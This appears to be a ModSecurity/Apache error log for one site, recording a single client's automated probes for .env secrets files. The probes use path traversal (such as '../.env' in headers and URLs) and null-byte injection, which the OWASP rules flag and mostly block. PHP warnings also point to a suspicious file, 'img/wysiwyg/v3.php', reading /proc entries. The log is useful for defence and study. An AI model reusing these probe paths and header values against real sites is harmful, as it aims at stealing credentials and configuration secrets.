[Tue May 12 04:39:23.816453 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.166:37452] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKS2wgpmE1yW0glLdgfOAAAANE"]
[Tue May 12 04:39:23.816644 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.166:37452] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKS2wgpmE1yW0glLdgfOAAAANE"]
[Tue May 12 04:39:23.856023 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS23o6NvB9WXx5V-6e4AAAAQ8"]
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704344/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704344/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704344/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704344/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704342/task/1704344/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704342/task/1704344/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:39:24.063130 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS29r1yOh9TvizeziP2gAAAFY"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:24.078013 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS29r1yOh9TvizeziP2wAAAFQ"]
[Tue May 12 04:39:24.089839 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS3Ho6NvB9WXx5V-6e4gAAAQ8"]
[Tue May 12 04:39:24.090056 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS3Ho6NvB9WXx5V-6e4gAAAQ8"]
[Tue May 12 04:39:24.096623 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Nr1yOh9TvizeziP3AAAAFY"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:24.096670 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Nr1yOh9TvizeziP3AAAAFY"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:24.096696 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Nr1yOh9TvizeziP3AAAAFY"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:24.096727 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Nr1yOh9TvizeziP3AAAAFY"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:24.096951 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Nr1yOh9TvizeziP3AAAAFY"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:24.096988 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Nr1yOh9TvizeziP3AAAAFY"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:24.097420 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 26)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Nr1yOh9TvizeziP3AAAAFY"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:24.699785 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.166:37452] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS2wgpmE1yW0glLdgfOAAAANE"]
[Tue May 12 04:39:24.723975 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKS3M1tk6y7yBJLpJopsgAAAIw"], referer: https://tchatbooster.com/var/www/.env
[Tue May 12 04:39:24.724200 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKS3M1tk6y7yBJLpJopsgAAAIw"], referer: https://tchatbooster.com/var/www/.env
[Tue May 12 04:39:24.827581 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS3AgpmE1yW0glLdgfOwAAAMY"]
[Tue May 12 04:39:24.827668 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS3AgpmE1yW0glLdgfOwAAAMY"]
[Tue May 12 04:39:24.827837 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS3AgpmE1yW0glLdgfOwAAAMY"]
[Tue May 12 04:39:24.964407 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3Ho6NvB9WXx5V-6e4gAAAQ8"]
[Tue May 12 04:39:24.982973 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS3Due9Sp-pIv_Bb61RgAAAUQ"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:24.983190 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS3Due9Sp-pIv_Bb61RgAAAUQ"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:25.091826 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 26 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3Nr1yOh9TvizeziP3AAAAFY"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:25.118532 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Xo6NvB9WXx5V-6e4wAAAQ8"]
[Tue May 12 04:39:25.118582 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Xo6NvB9WXx5V-6e4wAAAQ8"]
[Tue May 12 04:39:25.118608 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Xo6NvB9WXx5V-6e4wAAAQ8"]
[Tue May 12 04:39:25.119232 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:37448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS3Xo6NvB9WXx5V-6e4wAAAQ8"]
[Tue May 12 04:39:25.240729 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3M1tk6y7yBJLpJopsgAAAIw"], referer: https://tchatbooster.com/var/www/.env
[Tue May 12 04:39:25.266984 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKS3dr1yOh9TvizeziP3gAAAFQ"]
[Tue May 12 04:39:25.267172 2026] [security2:error] [pid 1825179:tid 1825218] [client 45.148.10.166:37408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKS3dr1yOh9TvizeziP3gAAAFQ"]
[Tue May 12 04:39:25.302582 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3AgpmE1yW0glLdgfOwAAAMY"]
[Tue May 12 04:39:25.680883 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS3c1tk6y7yBJLpJoptQAAAIw"], referer: https://tchatbooster.com/assets../../.env
[Tue May 12 04:39:25.681111 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS3c1tk6y7yBJLpJoptQAAAIw"], referer: https://tchatbooster.com/assets../../.env
[Tue May 12 04:39:25.843640 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS3Due9Sp-pIv_Bb61RgAAAUQ"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:25.873918 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/api/.env"] [unique_id "agKS3QgpmE1yW0glLdgfPQAAAMY"]
[Tue May 12 04:39:25.874102 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/.env"] [unique_id "agKS3QgpmE1yW0glLdgfPQAAAMY"]
